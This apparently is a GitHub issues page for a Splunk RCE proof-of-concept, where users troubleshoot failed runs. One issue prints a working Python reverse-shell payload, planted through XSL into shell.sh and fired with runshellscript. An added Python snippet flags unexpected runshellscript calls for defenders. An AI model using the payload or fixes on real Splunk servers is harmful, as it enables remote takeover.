
splunk-rce-poc's People

Contributors

nathan31337 avatar


splunk-rce-poc's Issues

Reverse shell triggering error - Dash vs Bash

I was testing the exploit script on our non-docker Splunk Enterprise 9.0.4 test environment and had an issue with triggering the uploaded reverse shell. It was interesting because the shell.sh was uploaded and the contents were correct. The exploit script said it was triggered and shell should be achieved. I could also run the same command on the Splunk VM and connect to nc. So the uploaded reverse shell was fine. But when the exploit script triggered the reverse shell via |runshellscript "shell.sh" "" "" "" "" "" "" "" "<jsid>", I would get an error.

runshellscript_error

When I tinkered with the uploaded shell and triggered the runshellscript from Splunk web interface, I noticed a change in the error code. That led me to explore other reverse shell options. One of the simple fixes was to replace the original reverse shell with a python reverse shell in the exploit script. For example:

<exsl:document href="/opt/splunk/bin/scripts/shell.sh" method="text">
        <xsl:text>export RHOST="{ip}";export RPORT={port};python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'</xsl:text>
    </exsl:document>

The python reverse shell works fine. But still I was confused why the original sh -i ... reverse shell was failing when triggered via the runshellscript.


We looked over it with my colleague Kert and he figured out what our issue was. Splunk's runshellscript executes the shell.sh with /bin/sh. But /bin/sh in itself is a symlink. In Docker versions of Splunk, it points to /bin/bash and the original exploit code works like a charm. In our environment /bin/sh was pointing to /bin/dash. Dash could not do the original reverse shell, hence it was failing.

So if someone is having a similar issue, replace the original reverse shell of the exploit script with something else like python based (see above). Or, point sh to bash instead of dash with:

ln -s /bin/bash /bin/sh -f
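
For defenders, the `|runshellscript "shell.sh" ...` trigger quoted in this issue is a concrete string to hunt for in recorded searches. The following is an added example, not code from the repository or the issue author: it flags `runshellscript` calls that name a script outside an allowlist. The event layout, the `EXPECTED_SCRIPTS` allowlist and the sample lines are constructed assumptions.

```python
import re
import shlex

# Assumption: scripts your own alert actions are expected to run.
EXPECTED_SCRIPTS = {"notify_oncall.sh"}

# Constructed sample events (simplified layout, not real log output).
SAMPLE_EVENTS = '''
user=alice action=search search='search index=main error | stats count by host'
user=svc_alert action=search search='| runshellscript "notify_oncall.sh" "" "" "" "" "" "" "" "sid_1"'
user=bob action=search search='|runshellscript "shell.sh" "" "" "" "" "" "" "" "sid_2"'
'''.strip().splitlines()

# Pull the user and the quoted search string out of one event line.
EVENT_RE = re.compile(r"user=(?P<user>\S+) action=search search='(?P<search>.*)'$")
# Match the command and its arguments up to the next pipe.
CMD_RE = re.compile(r"\|\s*runshellscript\s+(?P<args>[^|]*)", re.IGNORECASE)


def find_runshellscript(events, expected=EXPECTED_SCRIPTS):
    """Return (user, script) for each runshellscript call naming an unexpected script."""
    hits = []
    for line in events:
        event = EVENT_RE.search(line)
        if not event:
            continue
        for cmd in CMD_RE.finditer(event.group("search")):
            try:
                args = shlex.split(cmd.group("args"))
            except ValueError:
                # Unbalanced quotes: still report the call, without a name.
                args = []
            script = args[0] if args else "<unparsed>"
            if script not in expected:
                hits.append((event.group("user"), script))
    return hits


if __name__ == "__main__":
    for user, script in find_runshellscript(SAMPLE_EVENTS):
        print(f"unexpected runshellscript target {script!r} run by {user}")
```

Pair the search-side check with a file inventory of `/opt/splunk/bin/scripts/`, the directory the payload in this issue writes to, since the search string alone says nothing about how the script got there.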

Noticed issue on file upload

Exploit will not work at first.
I uploaded a file manually and got a message text.
Then I changed the exploit code and hardcoded a message text.
Then getting job is fine.

Turning proxy on (that part was sweet)
image

Fire exploit, see this on file upload stage
image

Upload xsl file manually
image

Changing exploit
image

After hardcoded message text
image

idk how to fix it, probably headers are wrong.

Thank you for a great research,
BR

Creating job Failed. Can't seem to get reverse shell back.

So I have tried installing Splunk 9.0.1 and also 9.1.1 as stated in a previous issue by you and also on your blog. I have tried both ways (installing it on Ubuntu and via Docker too). I am getting the same error. I am attaching a screenshot below. The upper one is on the on-prem version and the one below was tried on Docker as stated by you in issue 1

splunkissue
